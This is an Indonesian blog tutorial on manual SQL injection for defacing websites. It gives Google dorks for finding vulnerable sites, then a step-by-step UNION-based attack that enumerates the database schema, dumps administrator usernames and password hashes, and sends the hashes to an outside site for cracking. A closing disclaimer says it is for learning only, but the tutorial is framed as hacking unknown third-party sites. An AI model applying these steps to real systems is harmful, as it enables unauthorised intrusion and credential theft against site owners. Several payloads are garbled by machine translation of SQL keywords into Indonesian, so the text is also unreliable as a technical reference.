Deface SQL Injection [ Manual ]
Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Tutorial Deface SQL Injection [ Manual ]
Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website
Deface SQL Injection [ Manual ]
Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
- inurl:? pages.php id =
- inurl:? pages.php id =
copy dan paste salah satu script di Google seperti inurl:? id = index.php
2. Pilih salah Satu Web
Contoh => www.target.com/index.php?id=1
3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1 '
jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.
4. Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
5. Sekarang kita harus menemukan kolom rentan
serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
6. kita harus menemukan versi database
www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
7. Sekarang menemukan nama database
serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"
8. Sekarang menemukan nama semua tabel
union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -
ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel
biarkan kita menemukan nama tabel "administrator"
9. Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
10. Sekarang menemukan password dari user_name
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
itu akan menampilkan username dan password
itu akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi
untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk
Sekianlah Postingan Dari All Tutor Cyber tentang "Deface SQL Injection [ Manual ]" Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan "Cara Mengendalikan / Meretas PC Orang dari Jarak JauhDeface SQL Injection [ Manual ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/02/deface-sql-injection.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.
Sekian. Terimakasih
All Tutor Cyber
0 Blogger Comments
